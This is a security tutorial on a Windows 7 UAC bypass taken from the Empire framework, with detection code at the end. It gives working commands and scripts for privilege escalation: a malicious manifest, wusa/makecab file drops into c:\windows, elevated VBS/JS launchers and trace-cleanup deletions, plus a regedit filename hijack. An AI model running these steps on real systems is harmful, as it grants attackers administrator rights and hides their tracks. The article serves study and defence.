0x00 Preface

---

The well-known post-exploitation framework Empire serves as an excellent learning template, and the post-exploitation techniques it contains are worthy of in-depth study.

This article selects a classic UAC bypass method from Empire, Invoke-WScriptBypassUAC, for analysis: it explains the bypass principle and the further exploitation techniques it enables in penetration testing. Understanding how to exploit is key to knowing how to defend.

Invoke-WScriptBypassUAC address:

https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1

0x01 Introduction

---

This article will cover the following:

  • Invoke-WScriptBypassUAC bypass principles
  • Exploitation extensions
  • Defense and detection

0x02 Invoke-WScriptBypassUAC Bypass Principles

---

Invoke-WScriptBypassUAC is implemented in PowerShell and is conceptually derived from the uacscript project shared by Vozzie on GitHub:

https://github.com/Vozzie/uacscript

Vozzie mentioned that ZDI and Microsoft chose to ignore this UAC bypass 'vulnerability': ZDI considered it not to be a remote vulnerability, and Microsoft does not treat UAC bypasses as security vulnerabilities.

Invoke-WScriptBypassUAC uses several practical small tricks in its implementation, so this article focuses on analyzing its bypass method.

This method is only applicable to Win7 and does not apply to Win8 or Win10 (reasons explained later).

Test system: Win7 x86

Since the PowerShell source is publicly available, only the key operational flow of the script is summarized here:

  1. Check that the operating system is Win7 and that the current user is a standard (non-elevated) user.
  2. Write the file wscript.exe.manifest to the Temp directory.
  3. Use makecab.exe to pack wscript.exe.manifest and wscript.exe into CAB files.
  4. Use wusa to extract the CAB files, dropping wscript.exe.manifest and wscript.exe into the c:\Windows directory.
  5. Store the payload in an alternate data stream (ADS) of the AppData folder.
  6. Use c:\Windows\wscript.exe to execute the payload; the payload runs with administrator privileges, bypassing UAC.

0x03 Exploitation Extension

---

Once the operational flow is understood, each step can be tested manually, and more exploitation ideas surface along the way.

1. Save the wscript.exe.manifest file

The code is as follows:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"
manifestVersion="1.0">
<asmv3:trustInfo>
<security>
<requestedPrivileges>
<requestedExecutionLevel level="RequireAdministrator" uiAccess="false"/>
</requestedPrivileges>
</security>
</asmv3:trustInfo>
<asmv3:application>
<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
<dpiAware>true</dpiAware>
<autoElevate>true</autoElevate>
</asmv3:windowsSettings>
</asmv3:application>
</assembly>

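The two settings in the external manifest that matter for this technique are requestedExecutionLevel and autoElevate. The following script is an added example (not code from the original post or from Empire) that parses manifest XML with Python's standard library and reports whether a *.exe.manifest file would cause the loader to elevate the binary it sits beside; the sample manifests and the scratch-directory scan are constructed here for demonstration, and the function and file names are my own.

```python
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path
from typing import Dict, List

# Constructed sample manifests (not files from the page or from Empire).
# The first carries the two settings that make the loader elevate the binary:
# requestedExecutionLevel=requireAdministrator and autoElevate=true.
ELEVATING_MANIFEST = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1"
 xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" manifestVersion="1.0">
 <asmv3:trustInfo>
  <security>
   <requestedPrivileges>
    <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
   </requestedPrivileges>
  </security>
 </asmv3:trustInfo>
 <asmv3:application>
  <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
   <dpiAware>true</dpiAware>
   <autoElevate>true</autoElevate>
  </asmv3:windowsSettings>
 </asmv3:application>
</assembly>
"""

# A benign external manifest that only asks to run as the invoking user.
BENIGN_MANIFEST = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
  <security>
   <requestedPrivileges>
    <requestedExecutionLevel level="asInvoker" uiAccess="false"/>
   </requestedPrivileges>
  </security>
 </trustInfo>
</assembly>
"""


def _local(tag: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on qualified tags."""
    return tag.rsplit("}", 1)[-1]


def elevation_settings(xml_text: str) -> Dict[str, str]:
    """Return the execution level and autoElevate value declared in a manifest."""
    root = ET.fromstring(xml_text)
    found = {"level": "asInvoker", "autoElevate": "false"}
    for el in root.iter():
        name = _local(el.tag)
        if name == "requestedExecutionLevel":
            found["level"] = el.get("level", "asInvoker")
        elif name == "autoElevate":
            found["autoElevate"] = (el.text or "").strip()
    return found


def is_silently_elevating(xml_text: str) -> bool:
    """True when the manifest demands admin rights and opts into auto-elevation."""
    s = elevation_settings(xml_text)
    return (s["level"].lower() in ("requireadministrator", "highestavailable")
            and s["autoElevate"].lower() == "true")


def scan_external_manifests(directory: Path) -> List[str]:
    """List *.exe.manifest files in a directory that would cause silent elevation."""
    hits = []
    for manifest in sorted(directory.glob("*.exe.manifest")):
        try:
            if is_silently_elevating(manifest.read_text(encoding="utf-8")):
                hits.append(manifest.name)
        except ET.ParseError:
            # An unparsable manifest beside a binary deserves a look too, but
            # this check only reports manifests that parse and elevate.
            continue
    return hits


def demo_scan() -> List[str]:
    """Write both samples into a scratch directory and scan it (offline demo)."""
    with tempfile.TemporaryDirectory() as tmp:
        d = Path(tmp)
        (d / "wscript.exe.manifest").write_text(ELEVATING_MANIFEST, encoding="utf-8")
        (d / "notepad.exe.manifest").write_text(BENIGN_MANIFEST, encoding="utf-8")
        (d / "readme.txt").write_text("not a manifest", encoding="utf-8")
        return scan_external_manifests(d)


if __name__ == "__main__":
    print(elevation_settings(ELEVATING_MANIFEST))
    print(demo_scan())  # ['wscript.exe.manifest']
```

On a real host the same scan_external_manifests call can be pointed at C:\Windows or any other directory that should contain no loose manifests; a stray wscript.exe.manifest next to a copied wscript.exe is exactly the artifact this technique leaves behind while it runs.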
2. Use makecab to create CAB files

cmd:

makecab c:\windows\system32\wscript.exe %TMP%\1.tmp
makecab wscript.exe.manifest %TMP%\2.tmp

3. Use wusa to extract CAB files and deploy to c:\windows

cmd:

wusa %TMP%\1.tmp /extract:"c:\windows" /quiet
wusa %TMP%\2.tmp /extract:"c:\windows" /quiet

Note:

The key to the success of this method lies in using wusa to extract the CAB file into c:\windows. Normally, writing files into the c:\windows directory requires administrator privileges, but with wusa, ordinary user privileges suffice. Other directories that normally require administrator rights to write to can be used as well, for example C:\Windows\addins.

4. Use this wscript.exe to execute vbs or js scripts

cmd:

c:\windows\wscript.exe c:\test\1.vbs
c:\windows\wscript.exe c:\test\1.js

Note:

Here, the js and vbs script paths must be absolute. Although the command is issued from a cmd running with ordinary user privileges, wscript.exe.manifest in the same directory as wscript.exe declares that the program should start with administrator privileges, so the executed vbs or js script runs with administrator privileges, thereby achieving the UAC bypass.

A VBS script that runs a cmd command looks like this:

Dim objShell
Dim oFso
' FileSystemObject is created but not used in this snippet
Set oFso = CreateObject("Scripting.FileSystemObject")
Set objShell = WScript.CreateObject("WScript.Shell")
command = "cmd /c calc.exe"
' Second argument 0 = window style hidden
objShell.Run command, 0
Set objShell = Nothing

The corresponding JavaScript script is as follows:

new ActiveXObject("WScript.Shell").Run("cmd /c calc.exe",0,true);

5. Clear cache files after bypass

Delete wscript.exe and wscript.exe.manifest under c:\windows\

The corresponding VBS script is as follows:

Dim objShell
Dim oFso
' FileSystemObject is created but not used in this snippet
Set oFso = CreateObject("Scripting.FileSystemObject")
Set objShell = WScript.CreateObject("WScript.Shell")
command = "cmd /c del c:\windows\wscript.exe && del c:\windows\wscript.exe.manifest"
' Second argument 0 = window style hidden
objShell.Run command, 0
Set objShell = Nothing

The corresponding JavaScript script is as follows:

new ActiveXObject("WScript.Shell").Run("cmd /c del c:\\windows\\wscript.exe && del c:\\windows\\wscript.exe.manifest",0,true);

Note:

Deleting wscript.exe and wscript.exe.manifest under c:\windows\ requires administrator privileges, which is why the cleanup is done from the elevated script rather than from the original cmd.

Delete cache files:

del %TMP%\1.tmp
del %TMP%\2.tmp

6. Supplement

(1) Many directories can be abused in the same way; to check a folder's owner, use the following PowerShell command:

Get-Acl -Path c:\windows|select Owner

(2) There are many paths to save vbs or js scripts, such as special ADS:

  • ...files
  • Special COM files
  • Disk root directory

For more details, refer to the article 'Advanced Exploitation Techniques of Hidden Alternative Data Streams'

The ADS location used by Invoke-WScriptBypassUAC is also well hidden.

$env:USERPROFILE\AppData has the hidden and system attributes by default.

Therefore, dir /r does not show the folder $env:USERPROFILE\AppData, and naturally does not show the ADS attached to it.

To see it, use dir /a:h /r (/a:h lists hidden files), or list all files with dir /a /r.

(3) Reason for Win8 failure

On Win8, makecab and wusa can still extract CAB files into high-privilege directories such as c:\windows.

However, the trick of gaining high-privilege execution through wscript.exe plus an external wscript.exe.manifest fails, because Win8's wscript.exe carries an embedded manifest, and the loader prefers the embedded manifest over an external one.

(4) Reason for Win10 failure

On Win10, makecab and wusa can no longer be used to extract CAB files into high-privilege directories such as c:\windows (the /extract switch was removed from wusa).

Win10's wscript.exe also carries an embedded manifest.

0x04 Further exploitation of wusa feature

---

wusa feature:

A standard user can drop files into folders that normally require administrator rights.

Applicable to Win7, Win8

Exploitation one: Filename hijacking

1. Rename calc.exe to regedit.com

2. Release the file regedit.com in c:\windows

cmd:

makecab c:\test\regedit.com %TMP%\1.tmp
wusa %TMP%\1.tmp /extract:"c:\windows" /quiet

3. Hijacking

Entering regedit in cmd will execute regedit.com instead of regedit.exe, because cmd resolves extensions in PATHEXT order and .COM precedes .EXE.

For details on this exploitation method, refer to the article "A dirty way of tricking users to bypass UAC".

Other exploitation methods (omitted for now)

0x05 Defense

---

This UAC bypass method only applies to Win7, and no corresponding patch has been seen yet. Antivirus software can intercept this script, but there are also bypass methods.

From a defender's perspective, it is recommended to monitor the invocation of wusa.exe.
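To make the monitoring recommendation concrete, the following is an added example (not code from the original post or from Empire) of detection logic run over process-creation records. The records are constructed here in a simple Key=Value|Key=Value layout standing in for Sysmon event 1 or Security event 4688 data; the rule names, field names and sample paths are my own. Three rules capture the chain described in this article: wusa.exe extracting into a protected directory, makecab.exe packing a file that lives in a protected directory, and a Windows Script Host binary running from somewhere other than System32/SysWOW64.

```python
import re
from typing import Callable, Dict, List, Tuple

# Directories a standard user should never be able to populate.
PROTECTED_DIRS = ("c:\\windows", "c:\\program files", "c:\\program files (x86)")
# Where the genuine Windows Script Host binaries live.
WSH_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Constructed process-creation records (not real telemetry). Records 0, 2, 3
# and 4 mirror the steps of the technique; 1, 5 and 6 are benign noise.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\makecab.exe|CommandLine=makecab c:\windows\system32\wscript.exe C:\Users\alice\AppData\Local\Temp\1.tmp|IntegrityLevel=Medium",
    r"Image=C:\Windows\System32\makecab.exe|CommandLine=makecab wscript.exe.manifest C:\Users\alice\AppData\Local\Temp\2.tmp|IntegrityLevel=Medium",
    r'Image=C:\Windows\System32\wusa.exe|CommandLine=wusa C:\Users\alice\AppData\Local\Temp\1.tmp /extract:"c:\windows" /quiet|IntegrityLevel=Medium',
    r'Image=C:\Windows\System32\wusa.exe|CommandLine=wusa C:\Users\alice\AppData\Local\Temp\2.tmp /extract:"c:\windows" /quiet|IntegrityLevel=Medium',
    r"Image=C:\Windows\wscript.exe|CommandLine=c:\windows\wscript.exe c:\test\1.vbs|IntegrityLevel=High",
    r"Image=C:\Windows\System32\wscript.exe|CommandLine=wscript.exe C:\Scripts\logon.vbs|IntegrityLevel=Medium",
    r"Image=C:\Windows\System32\wusa.exe|CommandLine=wusa C:\Users\alice\Downloads\update.msu /quiet /norestart|IntegrityLevel=High",
]


def parse_event(line: str) -> Dict[str, str]:
    """Split a 'Key=Value|Key=Value' record into a dict."""
    fields: Dict[str, str] = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def _in_protected_dir(path: str) -> bool:
    """True if path is a protected directory or anything beneath one."""
    p = path.lower().strip('"').rstrip("\\")
    return any(p == d or p.startswith(d + "\\") for d in PROTECTED_DIRS)


def wusa_extract_to_protected_dir(ev: Dict[str, str]) -> bool:
    """wusa.exe asked to /extract a package into a protected directory."""
    if not ev.get("Image", "").lower().endswith("\\wusa.exe"):
        return False
    m = re.search(r'/extract:("[^"]*"|\S+)', ev.get("CommandLine", ""), re.IGNORECASE)
    return bool(m) and _in_protected_dir(m.group(1))


def makecab_of_protected_file(ev: Dict[str, str]) -> bool:
    """makecab.exe packing a file that lives under a protected directory."""
    if not ev.get("Image", "").lower().endswith("\\makecab.exe"):
        return False
    cmd = ev.get("CommandLine", "").lower()
    return any(d + "\\" in cmd for d in PROTECTED_DIRS)


def wsh_outside_system32(ev: Dict[str, str]) -> bool:
    """wscript.exe/cscript.exe executing from outside System32/SysWOW64."""
    image = ev.get("Image", "").lower()
    if image.rsplit("\\", 1)[-1] not in ("wscript.exe", "cscript.exe"):
        return False
    return not image.startswith(WSH_DIRS)


RULES: List[Tuple[str, Callable[[Dict[str, str]], bool]]] = [
    ("wusa_extract_to_protected_dir", wusa_extract_to_protected_dir),
    ("makecab_of_protected_file", makecab_of_protected_file),
    ("wsh_outside_system32", wsh_outside_system32),
]


def detect(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (record index, rule name) for every record a rule matches."""
    hits: List[Tuple[int, str]] = []
    for idx, line in enumerate(lines):
        ev = parse_event(line)
        for name, rule in RULES:
            if rule(ev):
                hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"record {idx}: {name}")
```

The wusa rule alone is enough to catch the filename hijacking variant from 0x04, since that chain also relies on wusa /extract into c:\windows; the WSH rule is the one that survives even if an attacker finds another way to drop the files, because a script host running from c:\windows rather than c:\windows\system32 has no legitimate reason to exist.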

0x06 Summary

---

This article analyzes Invoke-WScriptBypassUAC. Although Microsoft does not recognize this vulnerability, both penetration testers and defenders should pay attention to it during the post-exploitation phase.